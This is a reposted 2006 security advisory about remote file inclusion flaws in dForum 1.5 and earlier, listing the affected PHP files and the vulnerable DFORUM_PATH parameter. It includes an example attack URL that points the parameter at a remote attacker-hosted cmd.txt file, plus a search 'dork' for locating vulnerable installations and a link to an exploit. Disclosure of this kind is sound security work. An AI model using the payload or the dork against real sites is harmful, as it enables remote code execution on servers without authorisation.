Ads Advisory: dForum <= 1.5 Multiple Remote File Inclusion Vulnerabilities. Saturday, 22 April 2006 Version: 1.5 and prior versions must be affected. About: Via this methods remote attacker can include arbitrary files to dForum. There is lots of file inclusion on following files , they all have same vulnerability because they are module of dForum and did not set protection for them.The vulnerable parameter is DFORUM_PATH. Files -> about.php admin.php anmelden.php closethread.php config.php delpost.php delthread.php dfcode.php download.php editanoc.php forum.php login.php makethread.php menu.php newthread.php openthread.php overview.php post.php suchen.php user.php userconfig.php userinfo.php verwalten.php Level: Highly Critical --- How&Example: They all have same vulnerability just one example for them GET -> http://[victim]/[dForumPath]/verwalten.php?DFORUM_PATH=[FILE] EXAMPLE -> http://[victim]/[dForumPath]/dfcode.php?DFORUM_PATH=http://yourhost.com/cmd.txt? --- Timeline: * 21/04/2006: Vulnerability found. * 21/04/2006: Contacted with vendor and waiting reply. --- Exploit: http://www.nukedx.com/?getxpl=27 --- Dorks: "dForum v1.5"   < Prev   Next > [ Back ]

Main Menu SpamAlerts | Windows | Linux | Tutorials | Excell | WhitePapers | News | Spam | Virus Windows Focus VNews Vulnerability Hacking Sql Injection map Downloads Affiliates Online Store Free Ringtones Seo Directory IWebListin Jobs in India Freshers Jobs listings. Winkeyfinder

Copyright 2005-2007 SpamAlertz.com, Content on this site is From variuos other emails, and Advisories.